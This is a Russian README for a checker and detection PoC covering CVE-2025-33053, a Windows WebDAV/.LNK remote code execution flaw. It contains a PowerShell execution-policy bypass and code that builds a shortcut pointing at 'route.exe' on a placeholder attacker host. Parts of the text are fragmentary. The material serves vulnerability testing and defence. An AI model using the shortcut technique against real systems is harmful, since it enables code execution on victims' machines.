
CVE-2025-33053 Чекер и PoC
Checker Proof
PoC Proof
Полный набор инструментов для проверки и демонстрации возможной эксплуатации CVE-2025-33053, критической уязвимости удаленного выполнения кода (RCE) на основе WebDAV, затрагивающей системы Windows.
CVE-2025-33053 позволяет атакующим использовать файлы ярлыков .LNK, ссылающиеся на вредоносные удаленные ресурсы WebDAV, что потенциально может привести к удаленному выполнению кода (RCE) на затронутых системах.
.LNK..LNK или прямой доступ к UNC-пути — указывает на удаленный UNC-путь, например:.LNK открывается или UNC-путь просматривается вручную (например, через Проводник): - Служба WebClient инициирует связь с удаленным UNC-путем через WebDAV. - Система отправляет PROPFIND-запрос для получения метаданных с сервера атакующего.CVE-2025-33053_checker.ps1)| Проверка | Назначение |
|---|---|
| 🔍 Статус службы WebClient | Подтверждает, активна ли поддержка WebDAV и запущена ли она. |
| 🔍 Обработка UNC-путей через Test-Path | Проверяет, разрешает ли система удаленные UNC-пути WebDAV (ключевое условие для эксплуатации CVE). |
Откройте PowerShell от имени администратора.
Если выполнение сценариев ограничено, выполните:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Что он делает:
Использование:
python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ Использует реальное разрешение UNC-путей — без симуляции. ✔️ Перехватывает реальные запросы PROPFIND, инициированные ОС — точное поведение, необходимое для эксплуатации CVE. ✔️ Демонстрирует реальные доказательства уязвимости на сетевом уровне, без выполнения полезных нагрузок или причинения вреда.
Этот PoC не эксплуатирует и не наносит вреда целевой системе — он только обнаруживает лежащее в основе уязвимое поведение. Предназначен для использования в контролируемых средах или с явного разрешения. Демонстрирует реальное поведение системы — не имитационное моделирование. Использовать только в образовательных целях. Не запускать в неавторизованных системах.
Лицензия MIT — бесплатно только для образовательных, исследовательских и защитных целей.
Принимаются Pull Requests — улучшайте обнаружение, добавляйте функции или предлагайте исправления.
Этот репозиторий только для образовательных и авторизованных исследований безопасности. Неправомерное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет разрешения, строго запрещено.